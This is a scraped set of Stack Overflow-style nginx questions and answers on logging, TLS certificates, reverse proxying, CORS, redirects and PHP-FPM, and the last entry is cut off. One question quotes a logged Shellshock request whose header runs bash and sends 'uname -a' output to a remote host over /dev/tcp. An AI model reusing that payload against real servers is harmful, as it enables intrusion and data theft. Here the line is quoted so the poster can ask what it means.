process_name=%(program_name)s_%(process_num)02d
numprocs=1
stdout_logfile=/dev/stdout
stdout_logfile_maxbytes=0
redirect_stderr=true
[program:nginx]
command=bash -c "/usr/sbin/nginx -c /etc/nginx/nginx.conf"
stdout_logfile=/dev/null
stderr_logfile=/dev/null | how to stop dockerized nginx in foreground from flooding logs? |
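One detail worth flagging in the attempts listed above: the nginx directive is access_log (singular), so if access_logs was typed literally, nginx would reject it as an unknown directive. A minimal sketch of silencing the access log in the image's nginx.conf:

```nginx
# http context; error_log has no real "off" switch, so point it at
# /dev/null at a high severity if it must be quiet as well.
http {
    access_log off;
    error_log /dev/null crit;
}
```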
logrotate running as a daily cron job will rename log files in /var/log/nginx/*.log.
After that, nginx cannot output error log or access log to original log files. (For more details, refer to @mata's comment under this answer.)To solve this problem,USR1signal should be sent to nginx to reopen log files.
That's why postrotate sends USR1 to the nginx master; this signal is not meant to kill nginx. For more details on controlling nginx with signals, see this document. | In /etc/logrotate.d/nginx I find:
/var/log/nginx/*.log {
daily
missingok
rotate 52
compress
delaycompress
notifempty
create 640 nginx adm
sharedscripts
postrotate
[ -f /var/run/nginx.pid ] && kill -USR1 `cat /var/run/nginx.pid`
endscript
}
It's the postrotate command I'm curious about. I take this to mean that once the log has been successfully rotated, it kills the nginx process. I know when restarting nginx the new log will be created. What I can't work out is, how is the process automatically restarted, and is there any interruption to serving webpages? | How does Nginx restart after being killed by log-rotate?
1) For strong Diffie-Hellman and to avoid Logjam attacks, see this great manual. You need to extend your nginx config with these directives (after you generate the dhparams.pem file):
ssl_ciphers 'ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES256-GCM-SHA384:DHE-RSA-AES128-GCM-SHA256:DHE-DSS-AES128-GCM-SHA256:kEDH+AESGCM:ECDHE-RSA-AES128-SHA256:ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA384:ECDHE-ECDSA-AES256-SHA384:ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-AES256-SHA:DHE-RSA-AES128-SHA256:DHE-RSA-AES128-SHA:DHE-DSS-AES128-SHA256:DHE-RSA-AES256-SHA256:DHE-DSS-AES256-SHA:DHE-RSA-AES256-SHA:AES128-GCM-SHA256:AES256-GCM-SHA384:AES128-SHA256:AES256-SHA256:AES128-SHA:AES256-SHA:AES:CAMELLIA:DES-CBC3-SHA:!aNULL:!eNULL:!EXPORT:!DES:!RC4:!MD5:!PSK:!aECDH:!EDH-DSS-DES-CBC3-SHA:!EDH-RSA-DES-CBC3-SHA:!KRB5-DES-CBC3-SHA';
ssl_prefer_server_ciphers on;
ssl_dhparam /etc/nginx/ssl/dhparams.pem;
2) For a correct certificate chain use fullchain.pem, not cert.pem; see this great tutorial for details. And you will get an A grade :)
3) And as a bonus, try this great service: "Generate Mozilla Security Recommended Web Server Configuration Files". | I've used letsencrypt to install an SSL cert for the latest nginx on ubuntu.
The setup is fine and works great with the exception of: I don't know enough about SSL to know what's going on but I have a suspicion:
I installed the SSL cert for Apache a while back and just now moved to Nginx for its http/2 support. As the nginx plugin is not stable yet I had to install the cert myself, and this is what I did: In my nginx config (/etc/nginx/conf/default.conf) I added:
server {
listen 80;
server_name [domain];
return 301 https://$host$request_uri;
}
server {
listen 443 http2;
listen [::]:443 http2;
server_name [domain];
ssl on;
ssl_certificate /etc/letsencrypt/live/[domain]/cert.pem;
ssl_certificate_key /etc/letsencrypt/live/[domain]/privkey.pem;
}
Is it possible that this breaks the chain somehow? What is the proper way here? Thanks guys | How to install a letsencrypt cert with nginx?
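Point 2 of the answer, serving fullchain.pem rather than cert.pem, applied to the question's server block would look roughly like this (a sketch; [domain] is kept as the question's placeholder, and listen ... ssl is the newer spelling of ssl on;):

```nginx
server {
    listen 443 ssl http2;
    server_name [domain];
    # fullchain.pem bundles the leaf certificate with the intermediates,
    # which is what repairs the incomplete-chain warning.
    ssl_certificate     /etc/letsencrypt/live/[domain]/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/[domain]/privkey.pem;
}
```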
The $http_host parameter is set to the value of the Host request header. nginx uses that value to select a server block. If a server block is not found, the default server is used, which is either marked as default_server or is the first server block encountered. See this documentation. To force nginx to only accept named requests, use a catch-all server block to reject anything else, for example:
server {
listen 80 default_server;
return 403;
}
server {
listen 80;
server_name www.example.com;
...
}
With the SSL protocol, it depends on whether or not you have SNI enabled. If you are not using SNI, then all SSL requests pass through the same server block, in which case you will need to use an if directive to test the value of $http_host. See this and this for details. | Is it possible to allow only users typing in xxxxxx.com (fictive), so they have to make a DNS lookup and connect, and to block users who use my public IP to connect? Configuration:
server {
listen 80;
return 301 https://$host$request_uri;
}
server {
listen 443;
server_name xxxxxxx.com;
ssl_certificate /etc/nginx/ssl/server.crt;
ssl_certificate_key /etc/nginx/ssl/server.key;
ssl on;
ssl_session_cache builtin:1000 shared:SSL:10m;
ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
ssl_ciphers HIGH:!aNULL:!eNULL:!EXPORT:!CAMELLIA:!DES:!MD5:!PSK:!RC4;
ssl_prefer_server_ciphers on;
access_log /var/log/nginx/jenkins.access.log;
location / {
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
# Fix the “It appears that your reverse proxy set up is broken" error.
proxy_pass http://10.0.11.32:80;
proxy_read_timeout 360;
proxy_redirect http://10.0.11.32:80 https://xxxxxxx.com;
}
} | Nginx reverse proxy, only allow connection from hostname not ip |
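For the HTTPS side, nginx 1.19.4 and later offer an alternative to the if-based check mentioned in the answer: a catch-all server that refuses the TLS handshake for unmatched names (a sketch, not from the original answer):

```nginx
# No certificate is required here, because the handshake is rejected
# before one would be presented.
server {
    listen 443 ssl default_server;
    ssl_reject_handshake on;
}
```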
To do this you need the transparent parameter of the Nginx proxy_bind directive, which is available in Nginx Plus R10 or Nginx 1.11.2+. You also need to configure the routing table and firewall for IP transparency, and tc for direct server response. A working example is fully described here: https://www.nginx.com/blog/ip-transparency-direct-server-return-nginx-plus-transparent-proxy/ | Is there a way to configure Nginx to work as a Direct Server Return (DSR) load balancer similar to this: http://blog.haproxy.com/2011/07/29/layer-4-load-balancing-direct-server-return-mode/ | Can Nginx work as Direct Server Return load balancer?
If your docker container runs a linux system, you can use nano:
$ nano file.txt
If you only want to read the file, but not edit it, you can do this:
$ less file.txt | I have run 3 docker containers on one server. One with nginx, two with node apps. I can enter the nginx container using the exec command, but I want to look through the hosts file in etc. Is there any way to do this? Update: There is only the cat util. You can call it as cat your_filename | Is there any text editor inside docker container?
Rotate the log files. On OS X, newsyslog is the preferred utility to do that. Set up a file like this in /etc/newsyslog.d/nginx.conf:
# logfilename [owner:group] mode count size when flags [/pid_file] [sig_num]
/var/log/nginx.log deceze:wheel 644 2 1024 * J
Read https://www.newsyslog.org/manual.html for more information. | Nginx occupies all the available disk space. How to set limit for log files on Mac OS? | How to set limit for Nginx log files on Mac OS?
This looks like an attempted fork bomb: () { :;}; Fortunately, if your server is still running after that gets sent, it means it is being sanitised or ignored. As @TheGreatContini points out, this is actually an attempted Shellshock attack, which makes my answer a little unsafe. It's worth making sure your server is fully patched and up-to-date, and checking any outgoing traffic to make sure you weren't impacted. | I've setup django to alert me through email when any request fails and I'm constantly receiving this email:
Referrer: () { :;}; /bin/bash -c "echo <>/cgi-bin/index.cgi > /dev/tcp/<>/21; /bin/uname -a > /dev/tcp/<>/21; echo <>/cgi-bin/index.cgi > /dev/udp/<>/21"
Requested URL: /cgi-bin/index.cgi
User agent: () { :;}; /bin/bash -c "echo <>/cgi-bin/index.cgi > /dev/tcp/<>/21; /bin/uname -a > /dev/tcp/<>/21; echo <>/cgi-bin/index.cgi > /dev/udp/<>/21"
IP address: 127.0.0.1
What does it mean? Should I bother? I'm using nginx, ubuntu, gunicorn. | Django possible security attack
You can set CORS options in the server block so you don't have to repeat them for every location:
server {
listen 80;
server_name $host;
proxy_pass http://localhost:9080;
add_header 'Access-Control-Allow-Origin' '*';
location = / {...
Excerpt from the nginx documentation:
Syntax: add_header name value [always];
Default: —
Context: http, server, location, if in location | NginX Newbie. I want to use NginX as a reverse proxy for a websphere liberty appserver on the same machine running on port 9080. I want all requests to come thru NginX and all responses to enable CORS. I got this to work but there is a lot of repetition in my nginx conf. How do I re-use the CORS config across all locations?
server {
listen 80;
server_name $host;
proxy_pass http://localhost:9080;
location = / {
[ CORs configuration ]
}
location /two/ {
[ CORs configuration repeated ]
}
location /three/ {
[ CORs configuration repeated again ]
}
} | Enable CORs for all upstream server locations |
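One caveat with putting the headers in the server block: add_header directives are inherited from the enclosing level only when a location defines no add_header of its own. A sketch of an include-file pattern that sidesteps this (cors_params is a made-up filename):

```nginx
# /etc/nginx/cors_params (hypothetical) would contain the shared lines:
#   add_header 'Access-Control-Allow-Origin' '*';
server {
    listen 80;
    location /two/ {
        include cors_params;        # re-applied here because this location
        add_header X-Extra 'demo';  # adds its own header, which disables
                                    # inheritance from the server level
        proxy_pass http://localhost:9080;
    }
}
```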
You can use a combination of multiple servers (including the one with the wildcard subdomain). Here is a minimal example of such a config:
server {
listen 80;
server_name api.example.com;
add_header Content-Type text/plain;
return 200 "api";
}
server {
listen 80;
server_name *.example.com;
return 301 $scheme://example.com$request_uri;
}
server {
listen 80;
server_name example.com;
add_header Content-Type text/plain;
return 200 "main";
}
You can read more about configuring server names in the docs: http://nginx.org/en/docs/http/server_names.html | I've got a domain example.com and would like to redirect all subdomains to http://example.com.
One exception however would be the backend subdomain, which is api.example.com. How do I pull this off using Nginx? | Redirect all but one subdomains?
OK, I thought the old-fashioned way was the solution:
service php-fpm56 restart
(actually it worked because I typed it in the SSH terminal) I was wondering what the \xe2\x80\x8f was. It appears to be some extra characters added when I copy/pasted from skype to the ssh terminal. So systemctl restart php-fpm56.service would have worked if I had typed it instead of copy/pasting it from skype... Thanks to everyone | I have a webserver running with nginx on a CentOS.
I altered my php.ini file to increase some limits, but when I try to restart php, I get error messages:
[root@server ~]# php -v
PHP 5.6.3 (cli) (built: Nov 23 2014 15:09:34)
Copyright (c) 1997-2014 The PHP Group
Zend Engine v2.6.0, Copyright (c) 1998-2014 Zend Technologies
with the ionCube PHP Loader v4.7.1, Copyright (c) 2002-2014, by ionCube Ltd.
[root@server ~]# systemctl restart php-fpm56.service
Failed to issue method call: Unit php-fpm56.service\xe2\x80\x8f.service failed to load: No such file or directory.
[root@server ~]# systemctl restart php56.service
Failed to issue method call: Unit php56.service failed to load: No such file or directory.
[root@server ~]# service nginx reload
Redirecting to /bin/systemctl reload nginx.service
[root@server ~]# service nginx restart
Redirecting to /bin/systemctl restart nginx.service
[root@server ~]# systemctl restart php-fpm.service
Failed to issue method call: Unit php-fpm.service failed to load: No such file or directory.
[root@server ~]# systemctl restart php.service
Failed to issue method call: Unit php.service failed to load: No such file or directory.
[root@server ~]# systemctl restart php56.service
Failed to issue method call: Unit php56.service failed to load: No such file or directory.
Any idea how to restart PHP please? Thanks in advance | Reload php on CentOS
PHP-CGI is a CGI interface. PHP-FPM is a FastCGI interface. CGI gets run once per request. FastCGI gets run once, at server startup, then enters a request loop. This makes CGI simpler, as it has no dependencies; FastCGI is faster, since it avoids any start-up times, but it's a bit more complex to set up. | When we use nginx as webserver, we also use php-fpm.
If we use apache or lighttpd, we talk about php-cgi more. So the question is: what is the relationship and difference between php-cgi and php-fpm?
Thanks very much. | What relationship between php-cgi and php-fpm? |
Seems like upstream and a different keepalive are necessary for the ES backend to work properly; I finally had it working using the following configuration:
upstream elasticsearch {
server 127.0.0.1:9200;
keepalive 64;
}
server {
listen 8080;
server_name myserver.com;
error_log /var/log/nginx/elasticsearch.proxy.error.log;
access_log off;
location / {
# Deny Nodes Shutdown API
if ($request_filename ~ "_shutdown") {
return 403;
break;
}
# Pass requests to ElasticSearch
proxy_pass http://elasticsearch;
proxy_redirect off;
proxy_http_version 1.1;
proxy_set_header Connection "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header Host $http_host;
# For CORS Ajax
proxy_pass_header Access-Control-Allow-Origin;
proxy_pass_header Access-Control-Allow-Methods;
proxy_hide_header Access-Control-Allow-Headers;
add_header Access-Control-Allow-Headers 'X-Requested-With, Content-Type';
add_header Access-Control-Allow-Credentials true;
}
} | I've set up an Elasticsearch server with Kibana to gather some logs. Elasticsearch is behind a reverse proxy by Nginx, here is the conf:
server {
listen 8080;
server_name myserver.com;
error_log /var/log/nginx/elasticsearch.proxy.error.log;
access_log off;
location / {
# Deny Nodes Shutdown API
if ($request_filename ~ "_shutdown") {
return 403;
break;
}
# Pass requests to ElasticSearch
proxy_pass http://localhost:9200;
proxy_redirect off;
proxy_http_version 1.1;
proxy_set_header Connection "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header Host $http_host;
# For CORS Ajax
proxy_pass_header Access-Control-Allow-Origin;
proxy_pass_header Access-Control-Allow-Methods;
proxy_hide_header Access-Control-Allow-Headers;
add_header Access-Control-Allow-Headers 'X-Requested-With, Content-Type';
add_header Access-Control-Allow-Credentials true;
}
}
Everything works well, I can curl -XGET "myserver.com:8080" to check, and my logs come in. But every minute or so, in the nginx error logs, I get this:
2014/05/28 12:55:45 [error] 27007#0: *396 connect() failed (111: Connection refused) while connecting to upstream, client: [REDACTED_IP], server: myserver.com, request: "POST /_bulk?replication=sync HTTP/1.1", upstream: "http://[::1]:9200/_bulk?replication=sync", host: "myserver.com"
I can't figure out what it is; is there any problem in the conf that would prevent some _bulk requests from coming through? | Elasticsearch : Connection refused while connecting to upstream
Only the application can check whether a user is logged in or not, but you could use the X-Accel-Redirect header to make nginx serve one file or another. Some pseudocode:
if (user.isLoggedIn) {
response.setHeader("X-Accel-Redirect", "/app.html");
} else {
response.setHeader("X-Accel-Redirect", "/index.html");
}
response.end();Also you need to pass request to/to application.location = / {
# copy from location /api
} | I am using Node.js with nginx. My Node app is built on express and uses passport for authentication and is using sessions. My Node app is responding to JSON requests on all/apiurls, and nginx is serving static files from a public directory.I want nginx to serveindex.htmlat/when the user is not logged in, and serveapp.htmlat/when the user is logged in.Here's my current nginx config.upstream app_upstream {
server 127.0.0.1:3000;
keepalive 64;
}
server {
listen 0.0.0.0:80;
server_name app.com default;
access_log /var/log/nginx/app.com.access.log;
error_log /var/log/nginx/app.com.error.log debug;
root /home/app/app/public;
location /api {
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarder-For $proxy_add_x_forwarded_for;
proxy_set_header Host $http_host;
proxy_set_header X-NginX-Proxy true;
proxy_cache_bypass 1;
proxy_no_cache 1;
expires off;
if_modified_since off;
add_header Last-Modified "";
proxy_pass http://app_upstream;
proxy_redirect off;
}
location / {
access_log off;
expires max;
}
}
How do I get nginx to determine if a user is logged in or not, and then serve a different file accordingly? I've noticed that express creates a cookie called connect.sid, but that doesn't seem to go away when the user logs out. | Nginx serve different files based on user login?
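On the nginx side of the X-Accel-Redirect idea in the answer, the targets can be made internal-only so clients cannot fetch them directly (a sketch; the /serve/ prefix is invented for illustration):

```nginx
# The app responds to proxied requests with X-Accel-Redirect: /serve/app.html
# or /serve/index.html; nginx performs the internal redirect and serves
# the file itself, so the two HTML files never need public URLs.
location /serve/ {
    internal;
    alias /home/app/app/public/;
}
```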
This worked for me. This is assuming you only have an index.html/htm and the other urls are missing the physical file on disk.
server {
listen 80;
server_name www.example.com example.com;
root /u/apps/example/www;
index index.html;
location / {
if (!-e $request_filename) {
rewrite ^ / permanent;
}
}
} | I'm shutting down a site and I need to 301 redirect all pages to the home page, where I have a message saying that the site is being closed down. Basically any http://example.com/anyfolder -> 301 to http://www.example.com I have the following but this results in a redirection loop.
location ~ ^/([A-z]+) { rewrite ^ / permanent; }
What is the proper way to do this in nginx? | Nginx 301 Redirect all non home page urls to home page
Sorry to disappoint, it is not possible, not with today's nginx. It was said more than once via different forums and mailing lists that the nginx config doesn't support macros or conditional includes, which is what you are after. The config, except for some minimal things, is pretty static in nginx; you can't "program" it as you did on apache. I'll be happy to learn I am wrong, but ATM we all resort to hacks. It depends on your environment, but if you control the servers, you can put the geoip config into a separate directory and use globbing to include it. That is, don't put any file there on the servers without geoip, and put a config file with the geoip config there if the module is present. If this is not an option you probably have to modify the init script to do the checks and adapt the config. Example: assume you have a directory /etc/nginx/geoip/. On the server with the geoip module available there is a file inside the directory, default.http.scope, with the content:
geoip_country /usr/share/GeoIP/GeoIP.dat
On the servers without the geoip module, the directory is empty. In the nginx config at the http scope you can safely do:
include /etc/nginx/geoip/*.http.scope
on both servers, and only the one with files that match the pattern will try to configure geoip. | Is there any alternative to the ifmodule directive in apache? I'm trying to create a generic nginx.conf file for our company, but some sites have special requirements such as having the geoip module. In these sites, I need to declare a directive in nginx.conf, http section, to define the country database. The problem is that on other servers that module is not compiled, so I need a caveat to load it only if that module is installed. Any idea? Thanks in advance! | Apply directive in nginx.conf only if module is installed (apache ifmodule alternative)
You should split your server block. See: http://wiki.nginx.org/Pitfalls
server {
listen 80;
server_name name1.com;
location = / {
# no rewrite here
}
}
server {
listen 80;
server_name name2.com;
location = / {
# your rewrite here
}
} | I need to rewrite the url when users access a specific domain with the root (aka /) url.
So far I have:
server {
listen 80;
server_name name1.com name2.com;
location = / {
# Well, I need this only for NAME2.COM (it should not rewrite NAME1.COM)
rewrite name2.com/users/sign_in
}
}
How do I rewrite only for NAME2.COM? Sometimes NGINX syntax makes my stack overflow. Please help. | NGINX rewrite url if specific domain and specific url
I found the issue. The innocuous-looking rewrite rule as the first line rewrites the $request_uri and changes the $uri variable as part of request fulfillment. $request_uri is not changed by rewrite. So when I included that variable in the proxy_pass location, I was not properly including the edited url with the /couchdb/ removed. Changing the proxy_pass line to:
proxy_pass http://myusername.cloudant.com$uri;
now works without issue. This was not an SSL problem, nor a problem with Basic Authentication, nor another http header issue, nor a problem with Cloudant. This was all related to the URI I was forwarding my request to. | I'd like to expose some of Cloudant's couchdb features through NGINX running on my domain by using proxy_pass. So far I have worked out a few kinks (noted below), but I am stuck as far as authorization. Does anyone have any tips?
location /couchdb {
rewrite /couchdb/(.*) /$1 break; #chop off start of this url
proxy_redirect off
proxy_buffering off;
proxy_set_header Host myusername.cloudant.com;
# cannot use $host! must specify my vhost on cloudant
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header Authorization "Basic base64-encode(username:password)";
proxy_pass http://myusername.cloudant.com$request_uri;
# must use a variable in this url so that the domain is looked up late.
# otherwise nginx will fail to start about half the time because of resolver issues
# (unknown why though)
}
Using this setup, I can successfully proxy to Cloudant, but I always receive a forbidden response. For instance, this request:
http://mydomain/couchdb/my-cloudant-db
returns
{"error":"forbidden", "reason":"_reader access is required for this request"}
Thanks for any help. | NGINX Proxy to Cloudant
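A side note on the same problem (not from the answer): when proxy_pass carries a URI part, here just a trailing slash, nginx substitutes the matched /couchdb/ prefix itself, which removes the need for the rewrite line entirely:

```nginx
location /couchdb/ {
    proxy_set_header Host myusername.cloudant.com;
    # The trailing slash makes nginx forward /couchdb/mydb as /mydb.
    proxy_pass http://myusername.cloudant.com/;
}
```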
The correct way to increase the limit is by setting worker_rlimit_nofile. | How can I increase the file descriptors limit in nginx? There are several ways to increase file descriptors:
- Edit /etc/security/limits.conf and set nofile soft and hard limits for the nginx user.
- Set $ULIMIT in /etc/default/nginx. The nginx init.d script runs ulimit $ULIMIT https://gist.github.com/aganov/1121022#file-nginx-L43
- Set worker_rlimit_nofile in nginx.conf http://wiki.nginx.org/NginxHttpMainModule#worker_rlimit_nofile
Does setting limits in limits.conf affect nginx when started using the init.d script on boot? Do I have to use ulimit $ULIMIT in the init script, or can worker_rlimit_nofile be used instead? When using ulimit $ULIMIT in the init script, do I still need to use worker_rlimit_nofile to set limits for each worker? Thanks | Nginx File descriptor limit
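worker_rlimit_nofile belongs in the main (top-level) context of nginx.conf; a sketch with arbitrarily chosen values:

```nginx
# Raises each worker's RLIMIT_NOFILE without touching limits.conf
# or the init script.
worker_rlimit_nofile 65535;
events {
    # Keep worker_connections below the descriptor limit; a proxied
    # connection can consume two descriptors (client + upstream).
    worker_connections 16384;
}
```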
You could just repeat the location ~ \.php$ block inside the /administration/ block. As a workaround, I've also used this setup with success, which saves me from repeating the PHP configuration over and over in complex scenarios.
location ^~ /administration/ {
auth_basic "Restricted Area";
auth_basic_user_file /var/www/myproject/sec/htpasswd;
location ~ \.php$ {
try_files /dummy/$uri @php;
}
}
location ~ \.php$ {
try_files /dummy/$uri @php;
}
location @php {
fastcgi_pass unix:/var/run/php5-fpm.sock;
fastcgi_index index.php;
include fastcgi_params;
}
It basically uses a named location for the PHP configuration. Unfortunately you cannot use such a location everywhere. But it works with try_files. You should make sure that there's no directory /dummy/ on your server. | I have a problem with subfolders in a basic auth protected folder. In the protected folder I have a folder named phpmyadmin, which contains phpmyadmin. I'm not able to run phpmyadmin when basic auth is activated. When I call the folder, I get a save-as dialog (type: application/octet-stream (18,3 KB)). Here are the important parts of my sites-available/default:
location ^~ /administration/ {
auth_basic "Restricted Area";
auth_basic_user_file /var/www/myproject/sec/htpasswd;
}
location ~ \.php$ {
fastcgi_pass unix:/var/run/php5-fpm.sock;
fastcgi_index index.php;
include fastcgi_params;
}
Any ideas how I can run php in basic-auth protected subfolders? | Nginx Basic Auth and subfolders
Remove the "^". From
server_name ^~(?<domain_name>[^\.]*)\.(?[^\.]*)$;
to
server_name ~(?<domain_name>[^\.]*)\.(?[^\.]*)$;
Or switch "^" and "~". The letter "~" must be the first one.
server_name ~^(?<domain_name>[^\.]*)\.(?[^\.]*)$; | Is there anybody who can tell me why I still get an error like this?
Restarting nginx: [emerg]: unknown "domain_name" variable
configuration file /etc/nginx/nginx.conf test failed
The part of the code where the variable is used looks like:
server {
# if you're running multiple servers, instead of "default" you should
# put your main domain name here
listen 80 default;
# you could put a list of other domain names this application answers
server_name ^~(?<domain_name>[^\.]*)\.(?[^\.]*)$;
# root defined by domain
root /home/deployer/apps/$domain_name/current/;
# access && error && rewrite log
access_log /var/log/nginx/access.log;
error_log /var/log/nginx/error.log;
rewrite_log on;
# default location
location / {
... | Nginx server_name regexp not working as variable |
This is not just a urls.py thing, it's the normal workflow for running a wsgi or fastcgi app. The module is in memory, and it doesn't get reloaded from disk until you tell the server that it's changed. As per Django's FastCGI docs: If you change any Python code on your site, you'll need to tell FastCGI the code has changed. But there's no need to restart Apache in this case. Rather, just reupload mysite.fcgi, or edit the file, so that the timestamp on the file will change. When Apache sees the file has been updated, it will restart your Django application for you. If you have access to a command shell on a Unix system, you can accomplish this easily by using the touch command:
touch mysite.fcgi
For development, in most cases you can use the django development server, which watches for code changes and restarts when it sees something change. | I'm using django on nginx with FastCGI and I have a problem with urls.py. According to this question, django caches the urls.py file and I'm - just like the above question's author - not able to modify my URL definitions. My question is - is there any way to clear the url cache in django/nginx/fcgi without a server restart (which doesn't help anyway)? | Refresh urls.py cache in django
hmm, of course it's the user's fault. I had a wrong reference to the socket in the sites-available conf and an endless loop was the result. I fixed it in the gist. | I am trying to set up Nginx + Unicorn + Rails 3. Nginx will also serve some static and php projects. However when I open the site I always see a 400 Bad Request
Request Header Or Cookie Too Large error page. Nothing in the access nor error logs.
/etc/nginx
nginx.conf https://gist.github.com/1117152
php.conf https://gist.github.com/1117154
drop.conf https://gist.github.com/1117158
/etc/nginx/sites-enabled https://gist.github.com/1117161
I am pretty stuck here because I don't see anything in the logs. | Nginx Request header Or Cookie Too Large
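When the error is genuine, an oversized cookie or header rather than the redirect loop described in this row's answer, the relevant knob is large_client_header_buffers (sizes here are arbitrary; the default is 4 buffers of 8k):

```nginx
# http or server context.
large_client_header_buffers 4 16k;
```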
Apparently it is bytes per second. Source | These are the docs for X-Accel-Limit-Rate: "Sets the rate limit for this single request. Off means unlimited." Not much there. Most of the examples (I've found only two or three) I've seen set the value of X-Accel-Limit-Rate to 1024. This is obviously 1024 bytes, but per what? Or is that a total of some sort? Without knowing what the value means it's difficult to know what it's really doing. | What does X-Accel-Limit-Rate really do in NginX?
The Domain Auth Plugin uses the request.getClientAddr() method to determine the IP address of the client, which in turn uses both the REMOTE_ADDR variable and the X-FORWARDED-FOR header. Normally, you cannot rely on the X-FORWARDED-FOR header, seeing as just about anyone could have set it. But you can configure Zope to trust that header from a given set of trusted proxies. Using the list of trusted proxies, the REMOTE_ADDR IP address will be replaced with the next address given in the X-FORWARDED-FOR header, until you run out of addresses to trust. The last IP address found is then the new client address. This allows you to chain a set of proxies and still be able to trust you get the correct client address to base your roles on. To configure Zope to trust a proxy's X-FORWARDED-FOR header, set the trusted-proxy configuration parameter in the zope.conf file. If your nginx server runs on the same host, just set it to localhost:
trusted-proxy 127.0.0.1
You specify more than one name by adding multiple entries:
trusted-proxy 127.0.0.1
trusted-proxy loadbalancer.localnet
trusted-proxy takes both IP addresses and hostnames. | I'm trying to use the Domain Auth Plugin to assign the Membership role to site visitors based on their IP address. I can configure the plugin OK, but it occurs to me all the requests will be coming from localhost and not the "real" IP address. In this case I'm using NGINX, so I tried setting X-Real-IP to $remote_addr via proxy_set_header (e.g. http://wiki.nginx.org/HttpProxyModule), but as far as I can tell that just makes the IP address available in the header. How do I make the requests sent from NGINX to Plone appear to be originating from the remote IP address? I'm using NGINX but I'm open to answers that apply to Apache too. | How do I configure my web server to work with the PluggableAuthService's Domain Auth Plugin?
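The nginx half of this setup only needs to append the client address so Zope's trusted-proxy handling can unwind the chain (a sketch; the upstream address is a placeholder):

```nginx
location / {
    # $proxy_add_x_forwarded_for appends $remote_addr to any incoming
    # X-Forwarded-For, exactly the list Zope walks backwards.
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    proxy_pass http://127.0.0.1:8080;
}
```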
Compojure is written on ring, and ring has middleware :) You would write a middleware called with-uuid that adds the UUID to the request map on the way in and to the reply on the way out. | We are running nginx as a reverse proxy that forwards requests to a Clojure application running Compojure, a library that wraps around Jetty and provides our application with the ability to service web requests. We currently capture logs generated by both nginx and the Clojure application (via log4j to syslog). We are unable, however, to match an entry in the nginx log to an entry in the syslog output of the Clojure application. We need to figure out a way to modify the request sent upstream to the Clojure app to include some kind of ID. This could be an integer, UUID, whatever. Do you have any suggestions as to how best to accomplish this? Thanks for your help! | add unique id to requests forwarded from nginx reverse proxy
Problem solved, I am a spanner. I had 'passenger_enabled on;' inside 'location /' not 'server'. I hereby hand in my coding hands. | Essentially, my route is working perfectly, Passenger seems to be loading - all is hunky-dory. Except that nothing Railsy happens. Here's my Nginx log from starting the server to the first request (ignore the different domain/route - it's because I haven't moved the new domain over yet, and it's returning a 403 error because there's no index file in the public folder):
[ pid=24559 file=ext/nginx/HelperServer.cpp:826 time=2009-11-10 00:49:13.227 ]:
Passenger helper server started on PID 24559
[ pid=24559 file=ext/nginx/HelperServer.cpp:831 time=2009-11-10 00:49:13.227 ]:
Password received.
2009/11/10 00:49:53 [error] 24578#0: *1 directory index of "/var/www/***/current/public/" is forbidden, client: 188.221.195.27, server: ***, request: "GET / HTTP/1.1", host: "***"
2009/11/10 00:49:54 [error] 24578#0: *1 open() "/var/www/***/current/public/favicon.ico" failed (2: No such file or directory), client: 188.221.195.27, server: ***, request: "GET /favicon.ico HTTP/1.1", host: "***", referrer: "***"Someone on the RubyOnRails IRC channel suggested that it might be a webserver permissions problem. I had a suspicion that it might be a filesystem permission problem, but then Nginx runs as www-data and Passenger as root.I can load static files from within the public directory fine, but no Rails application is being launched. Does anyone have an idea? My head is gradually melting away figuring this one out!Edit: Here's the vhost file:server {
listen 80;
server_name ***;
passenger_enabled on;
location / {
root /var/www/***/current/public;
index index.html index.htm;
}
#error_page 404 /404.html;
# redirect server error pages to the static page /50x.html
#
error_page 500 502 503 504 /50x.html;
location = /50x.html {
root html;
}
} | Passenger, Nginx, and Capistrano - Passenger not launching Rails app at all |
I came across this issue a while back, and I think the issue is with the headers.
In the MDN docs it is stated here that, other than for simple requests, we'll get preflighted requests with the OPTIONS method. There are 3 main headers that we need to send in the response in your case:
Access-Control-Allow-Origin: http://localhost:1337
Access-Control-Allow-Methods: POST, GET, OPTIONS
Access-Control-Allow-Headers: Content-Type
From the looks of it you have configured the first header, and you should be seeing it in the network tab too. Since the error is about missing allow headers, you need to add the Access-Control-Allow-Methods header to your nginx file:
add_header 'Access-Control-Allow-Methods' 'GET, POST, OPTIONS';
Seeing your network tab with the request headers will give more context here; generally you should be seeing the Access-Control-Request-Method and Access-Control-Request-Headers headers in the OPTIONS request. If there are some headers that you aren't allowing, please write an nginx rule for the same. You can look into this solution for more reference | I have a question about cors implementation in django.
Having a problem with setting the correct cors values.
My deployment is on docker.
I have deployed 3 containers:
backend: Django + DRF as backend (exposes port 8000)
Nginx to serve my backend (uses the exposed port 8000 and maps it to 1338)
frontend: React app used with nginx (uses port 1337)
Everything is on localhost.
I use axios from frontend to call get/post requests. (I call to 1338 port then I think it is redirected to internal service on 8000 port)
For backend I had to install django-cors-headers package to work with CORS.
I think I set it up correctly, but there are scenarios where it does not work.
In settings.py:
INSTALLED_APPS = [
...
"corsheaders",
]
...
MIDDLEWARE = [
...
"corsheaders.middleware.CorsMiddleware",
"django.middleware.common.CommonMiddleware",
...
]
Nginx.conf for the nginx image:
upstream backend {
server backend:8000;
}
server {
listen 80;
add_header Access-Control-Allow-Origin *;
location / {
proxy_pass http://backend;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header Host $host:1337;
proxy_redirect off;
}
location /static/ {
